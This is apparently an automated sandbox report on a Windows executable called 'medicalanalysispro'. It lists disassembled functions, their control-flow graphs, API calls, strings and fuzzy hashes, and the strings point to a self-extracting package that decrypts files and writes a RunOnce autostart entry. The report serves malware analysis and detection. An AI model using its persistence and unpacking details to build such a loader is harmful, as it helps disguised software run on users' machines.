                                                                                                                                                                                                                                                                                                                • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                                                                                                • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                                                                                                • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                                                                                                • Opcode ID: 73d02511bd41989529bcd23ff6b0e0c8ec250e42df1f9c8d155ed0afd688ad53
                                                                                                                                                                                                                                                                                                                • Instruction ID: 18a6768ad857a067399041e24d0c9059460ff4dc13d52ec46ee3fb361fdccb95
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73d02511bd41989529bcd23ff6b0e0c8ec250e42df1f9c8d155ed0afd688ad53
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DF51F735A08B42C6EB10AB60E8547B9FAA0FB89746FC58135D94E06B5ADF3DF125C730
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A30EC Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 151libraryfileloaderCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 468 7ff7600a30ec-7ff7600a3114 469 7ff7600a3141-7ff7600a3148 call 7ff7600a5fe4 468->469 470 7ff7600a3116-7ff7600a311c 468->470 477 7ff7600a3236 469->477 478 7ff7600a314e-7ff7600a3155 call 7ff7600a66c4 469->478 472 7ff7600a3134-7ff7600a313b call 7ff7600a3f74 470->472 473 7ff7600a311e call 7ff7600a60a4 470->473 472->469 472->477 479 7ff7600a3123-7ff7600a3125 473->479 482 7ff7600a3238-7ff7600a3258 call 7ff7600a8470 477->482 478->477 486 7ff7600a315b-7ff7600a319d GetSystemDirectoryA call 7ff7600a7ba8 LoadLibraryA 478->486 479->477 483 7ff7600a312b-7ff7600a3132 479->483 483->469 483->472 490 7ff7600a319f-7ff7600a31b8 GetProcAddress 486->490 491 7ff7600a31c9-7ff7600a31de FreeLibrary 486->491 490->491 492 7ff7600a31ba-7ff7600a31c3 DecryptFileA 490->492 493 7ff7600a31e4-7ff7600a31ea 491->493 494 7ff7600a3273-7ff7600a3288 SetCurrentDirectoryA 491->494 492->491 493->494 497 7ff7600a31f0-7ff7600a320b GetWindowsDirectoryA 493->497 495 7ff7600a3291-7ff7600a3297 494->495 496 7ff7600a328a-7ff7600a328f 494->496 499 7ff7600a332d-7ff7600a3335 495->499 500 7ff7600a329d-7ff7600a32a4 495->500 498 7ff7600a3212-7ff7600a3230 call 7ff7600a4dcc call 7ff7600a7700 496->498 501 7ff7600a325a-7ff7600a326a call 7ff7600a6ca4 497->501 502 7ff7600a320d 497->502 498->477 505 7ff7600a3337-7ff7600a3339 499->505 506 7ff7600a3349 499->506 507 7ff7600a32a9-7ff7600a32b7 500->507 512 7ff7600a326f-7ff7600a3271 501->512 502->498 505->506 508 7ff7600a333b-7ff7600a3342 call 7ff7600a2318 505->508 511 7ff7600a334b-7ff7600a3359 506->511 507->507 509 7ff7600a32b9-7ff7600a32c0 507->509 519 7ff7600a3347 508->519 514 7ff7600a32c2-7ff7600a32c9 509->514 515 7ff7600a32fb call 7ff7600a5d90 509->515 517 7ff7600a3376-7ff7600a337d 511->517 518 7ff7600a335b-7ff7600a3361 511->518 512->477 512->494 514->515 520 7ff7600a32cb-7ff7600a32f9 call 7ff7600a7ac8 514->520 527 7ff7600a3300 515->527 524 7ff7600a337f-7ff7600a3381 517->524 525 7ff7600a3388-7ff7600a338d 517->525 518->517 523 7ff7600a3363 call 7ff7600a40c4 518->523 519->511 531 7ff7600a3302 520->531 532 7ff7600a3368-7ff7600a336a 523->532 524->525 529 7ff7600a3383 call 7ff7600a494c 524->529 525->482 527->531 529->525 534 7ff7600a3304-7ff7600a330e 531->534 535 7ff7600a3313-7ff7600a3321 call 7ff7600a772c 531->535 532->477 536 7ff7600a3370 532->536 534->477 535->477 539 7ff7600a3327 535->539 536->517 539->499
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: DirectoryLibrary$AddressAllocDecryptFileFreeLoadLocalProcSystemWindows
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                                                                                                • API String ID: 3010855178-3123416969
                                                                                                                                                                                                                                                                                                                • Opcode ID: cf47587dfbe55bd8e5be1b8ceb9bd214e6a725bb0b495cd8f058f5f742f6bee5
                                                                                                                                                                                                                                                                                                                • Instruction ID: 76e44261e745a8f4bea03d49893f412cd9813304798f93b7e7b3ea75daa6d4be
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf47587dfbe55bd8e5be1b8ceb9bd214e6a725bb0b495cd8f058f5f742f6bee5
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 77711631E0C642C6FA60BB21A8407B5E6A4AF98740FC58136E94E46F9FDF6CF5648730
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A64E4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 123COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 567 7ff7600a64e4-7ff7600a6510 568 7ff7600a65df-7ff7600a65ee 567->568 569 7ff7600a6516-7ff7600a651b call 7ff7600a63b8 567->569 571 7ff7600a65f1-7ff7600a65fb 568->571 572 7ff7600a6520-7ff7600a6522 569->572 573 7ff7600a6610-7ff7600a661b 571->573 574 7ff7600a65fd-7ff7600a6603 571->574 576 7ff7600a6688-7ff7600a668a 572->576 577 7ff7600a6528-7ff7600a653e 572->577 575 7ff7600a661e-7ff7600a6628 call 7ff7600a6b70 573->575 574->573 578 7ff7600a6605-7ff7600a660e 574->578 587 7ff7600a662a-7ff7600a663d CreateDirectoryA 575->587 588 7ff7600a6649-7ff7600a664b 575->588 579 7ff7600a6698-7ff7600a66bc call 7ff7600a8470 576->579 581 7ff7600a6541-7ff7600a654b 577->581 578->571 578->573 584 7ff7600a6560-7ff7600a6575 581->584 585 7ff7600a654d-7ff7600a6553 581->585 590 7ff7600a6577-7ff7600a658f GetSystemInfo 584->590 591 7ff7600a65cc-7ff7600a65dd call 7ff7600a7ba8 584->591 585->584 589 7ff7600a6555-7ff7600a655e 585->589 594 7ff7600a663f 587->594 595 7ff7600a667d-7ff7600a6682 call 7ff7600a7700 587->595 596 7ff7600a668c-7ff7600a6693 588->596 597 7ff7600a664d-7ff7600a6655 call 7ff7600a6ca4 588->597 589->581 589->584 592 7ff7600a6591-7ff7600a6594 590->592 593 7ff7600a65bb 590->593 591->575 599 7ff7600a65b2-7ff7600a65b9 592->599 600 7ff7600a6596-7ff7600a6599 592->600 601 7ff7600a65c2-7ff7600a65c7 call 7ff7600a7ba8 593->601 594->588 595->576 596->579 608 7ff7600a665a-7ff7600a665c 597->608 599->601 605 7ff7600a65a9-7ff7600a65b0 600->605 606 7ff7600a659b-7ff7600a659e 600->606 601->591 605->601 606->591 610 7ff7600a65a0-7ff7600a65a7 606->610 608->596 611 7ff7600a665e-7ff7600a6664 608->611 610->601 611->576 612 7ff7600a6666-7ff7600a667b RemoveDirectoryA 611->612 612->576
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,00007FF7600A2CE1), ref: 00007FF7600A657C
                                                                                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF7600A2CE1), ref: 00007FF7600A662F
                                                                                                                                                                                                                                                                                                                • RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF7600A2CE1), ref: 00007FF7600A666F
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A63B8: RemoveDirectoryA.KERNELBASE(0000000A,00007FF7600A2CE1), ref: 00007FF7600A6423
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A63B8: GetFileAttributesA.KERNELBASE ref: 00007FF7600A6432
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A63B8: GetTempFileNameA.KERNEL32 ref: 00007FF7600A645B
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A63B8: DeleteFileA.KERNEL32 ref: 00007FF7600A6473
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A63B8: CreateDirectoryA.KERNEL32 ref: 00007FF7600A6484
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                                                                                                • API String ID: 1979080616-3703068183
                                                                                                                                                                                                                                                                                                                • Opcode ID: 7d4d860df232b0db62657ebb5dc88ca939e84df122defa6df573680caeaa5849
                                                                                                                                                                                                                                                                                                                • Instruction ID: b0ace4d85fbcaec1c8aeff5016f6bbd5147c9af9d5d6ff19b6e7a052af212b8d
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d4d860df232b0db62657ebb5dc88ca939e84df122defa6df573680caeaa5849
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60514B61F19682C1FA51AB29A8102B9E7B0AF45B80FD84536D94E43B9FDF7DF425C230
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A2C54 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 84libraryloadershutdownCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Handle$AddressCloseExitModuleProcVersionWindows
                                                                                                                                                                                                                                                                                                                • String ID: @$HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                                                                                                • API String ID: 1302179841-1204263913
                                                                                                                                                                                                                                                                                                                • Opcode ID: daf853eb771a12f59abebe1272519bf3fa6e24b0f3f778556f2b7b241e27ec3d
                                                                                                                                                                                                                                                                                                                • Instruction ID: 942089e3428ddf9f0d93bc7cab30ff6c30675587eeafc96553769c0bc9b51e28
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: daf853eb771a12f59abebe1272519bf3fa6e24b0f3f778556f2b7b241e27ec3d
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41313D31E08A42C6FA64BB25A44067AF6A0EF59B50FC44135DA0E06F9FDF6DF8608630
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A204C Relevance: 12.1, APIs: 8, Instructions: 119filestringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 836429354-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
                                                                                                                                                                                                                                                                                                                • Instruction ID: 5ac841384eb661c5ff9d5b8da0bdebdb19ce886e7fa76f046418613826c9d62a
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81517F32618A81D5EB11AF25D8402F8B7A1FB45B84FC48171DA4E07B9ADF3DE919C330
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A61EC Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 97registryfileCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce
                                                                                                                                                                                                                                                                                                                • API String ID: 3049360512-2857993011
                                                                                                                                                                                                                                                                                                                • Opcode ID: 285f597593c32024cf9c471d1af6d0a8522d76691d49594ed48c2a869cdc583c
                                                                                                                                                                                                                                                                                                                • Instruction ID: faadda2407fcf6ef351123593b8f61582f5c19daa75afe6e73c06c3c8cc1f20c
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 285f597593c32024cf9c471d1af6d0a8522d76691d49594ed48c2a869cdc583c
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84511A21A08A82C6EB51AB14E8543B9B7B0FB85B44FC44131DA4E07B9ADF2DF468C730
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A473C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 115processsynchronizationwindowCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 3183975587-3916222277
                                                                                                                                                                                                                                                                                                                • Opcode ID: 0612355d7098dd9214d3ec5057fb5c6aaccd7f37b0a93b2f13a3672e5b451275
                                                                                                                                                                                                                                                                                                                • Instruction ID: a4235d5b00cb4c0a3f619339ec187ed31748a8c7986f1160949d701a548a62b8
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0612355d7098dd9214d3ec5057fb5c6aaccd7f37b0a93b2f13a3672e5b451275
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1512E32908A81C6E760AB54E45437AF7A0FB88755F944135DA4E46BAACFBCF464CB30
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A2318 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75registryCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                                                                                                • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                                                                                                • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                                                                                                • Opcode ID: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
                                                                                                                                                                                                                                                                                                                • Instruction ID: 29fd9c7984cc2485872b1a213f56e807d013f8637f9f474aa2dc48c54c6c0641
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E317032B08B42CBD720AF65E8406A9F7A4FB89754F844535EA8D43F59DF38E564CB20
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A63B8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 71fileCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                                                                                                • String ID: IXP$IXP%03d.TMP
                                                                                                                                                                                                                                                                                                                • API String ID: 1082909758-3932986939
                                                                                                                                                                                                                                                                                                                • Opcode ID: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
                                                                                                                                                                                                                                                                                                                • Instruction ID: ceb56696e7d264298211defc6a4981f5cc94eb4a308ba95f40361f2a8f0743ac
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60212C71B08941C6E610AB56A9503F9EBA1EB8EB81F858130DD4E46B9ACF3DE455C620
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A8200 Relevance: 12.1, APIs: 8, Instructions: 136sleepCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 701 7ff7600a8200-7ff7600a8249 call 7ff7600a8964 GetStartupInfoW 705 7ff7600a824b-7ff7600a8256 701->705 706 7ff7600a8262-7ff7600a826b 705->706 707 7ff7600a8258-7ff7600a825b 705->707 710 7ff7600a8284-7ff7600a828c 706->710 711 7ff7600a826d-7ff7600a8275 _amsg_exit 706->711 708 7ff7600a8277-7ff7600a8282 Sleep 707->708 709 7ff7600a825d 707->709 708->705 709->706 713 7ff7600a82e7 710->713 714 7ff7600a828e-7ff7600a82ab 710->714 712 7ff7600a82f1-7ff7600a82fa 711->712 715 7ff7600a8319-7ff7600a831b 712->715 716 7ff7600a82fc-7ff7600a830f _initterm 712->716 713->712 717 7ff7600a82af-7ff7600a82b2 714->717 718 7ff7600a8326-7ff7600a832e 715->718 719 7ff7600a831d-7ff7600a831f 715->719 716->715 720 7ff7600a82b4-7ff7600a82b6 717->720 721 7ff7600a82d9-7ff7600a82db 717->721 722 7ff7600a8330-7ff7600a833e call 7ff7600a88d0 718->722 723 7ff7600a835a-7ff7600a8369 718->723 719->718 724 7ff7600a82b8-7ff7600a82bc 720->724 725 7ff7600a82dd-7ff7600a82e2 720->725 721->712 721->725 722->723 734 7ff7600a8340-7ff7600a8350 722->734 729 7ff7600a836d-7ff7600a8373 723->729 727 7ff7600a82ce-7ff7600a82d7 724->727 728 7ff7600a82be-7ff7600a82ca 724->728 730 7ff7600a8444-7ff7600a8459 725->730 727->717 728->727 732 7ff7600a8375-7ff7600a8377 729->732 733 7ff7600a83e6-7ff7600a83e9 729->733 738 7ff7600a8379-7ff7600a837b 732->738 739 7ff7600a837d-7ff7600a8382 732->739 735 7ff7600a83f8-7ff7600a8400 _ismbblead 733->735 736 7ff7600a83eb-7ff7600a83f4 733->736 734->723 740 7ff7600a8402-7ff7600a8405 735->740 741 7ff7600a840a-7ff7600a8412 735->741 736->735 738->733 738->739 742 7ff7600a8390-7ff7600a83c5 call 7ff7600a2c54 739->742 743 7ff7600a8384-7ff7600a838e 739->743 740->741 741->729 741->730 746 7ff7600a83cf-7ff7600a83d6 742->746 747 7ff7600a83c7-7ff7600a83c9 exit 742->747 743->739 748 7ff7600a83e4 746->748 749 7ff7600a83d8-7ff7600a83de _cexit 746->749 747->746 748->730 749->748
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 2995914023-0
